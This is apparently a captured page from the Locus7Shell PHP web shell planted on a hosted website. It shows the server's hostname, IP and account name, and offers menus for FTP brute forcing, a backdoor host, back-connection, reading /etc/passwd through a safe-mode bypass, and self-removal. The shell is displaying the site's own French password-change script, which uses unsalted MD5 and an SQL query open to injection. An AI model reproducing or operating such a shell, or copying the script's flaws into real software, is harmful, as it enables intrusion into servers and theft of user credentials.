Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/   drwx---r-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     changepassword.php (2.34 KB)      -rw----r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

$user 
$_SESSION['identifiant'];

if (
$user)
{
//Si l'utilisateur est connécté:

if (isset($_POST['submit']))
{
// Verification des données
       
$oldpassword md5($_POST['oldpassword']);
       
$newpassword md5($_POST['newpassword']);
       
$renewpassword md5($_POST['renewpassword']);


       
// vérification du mot de passe dans la base de donnée
       
//connection à la database
include ("connect.php");
       
       
$queryget mysql_query("SELECT PASSWORD FROM users WHERE PSEUDO='$user'") or die ("L'interogation de base de donnée ne fonctionne pas");
       
$row mysql_fetch_assoc($queryget);
       
       
$oldpassworddb $row['PASSWORD'];
       
       
// Vérification mot de passe
       
if ($oldpassword==$oldpassworddb)
       {
       
       
// vérifier les 2 nouveaux mot de passe
          
if ($newpassword==$renewpassword)
           {
           
//success, changement du mot de passe
           
$querychange mysql_query("
           UPDATE users SET PASSWORD='
$newpassword' WHERE PSEUDO='$user'
           "
);
           
// session_destroy(); a remettre si il y a un bug lors du changement de mot de passe (essai)
           
echo("<br> <span class='Style5'>Votre mot de passe viens d'être modifié avec succés. <a href='index.php?=member'><strong>Retour</strong></a> à la page principale<span>");
           
           }
           else
              echo(
"Répétition du mot de passe incorect");
       
       
       }
       else
         echo(
"Ancien mot de passe non valide");
}
else
 {
 
 }
echo
"
<form action='index.php?page=changepassword' method='POST'>
<br><span class='Style5'>
<span class='Style6'>Changement mot de passe</span><p>
<table width='400' border='0' cellspacing='0' cellpadding='0'>

  <tr>
    <td>Ancien Mot de passe: </td>
    <td><input type='text' name='oldpassword'><br>
<img src='image/transparent.png' width='30' height='4' /></td>
  </tr>
  <tr>
    <td>Nouveau Mot de passe: </td>
    <td><input type='password' name='newpassword'><br>
<img src='image/transparent.png' width='30' height='4' /></td>
  </tr>
  <tr>
    <td>Confirmer: </td>
    <td><input type='password' name='renewpassword'><br>
<img src='image/transparent.png' width='30' height='4' /></td>
  </tr>

</table>  </span>
    <input type='submit' name='submit' value='Confirmer le changement'>
</form>
"
;

}
else
    echo(
"Vous devez être connecter pour changer votre mot de passe"); 


?>

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0066 ]--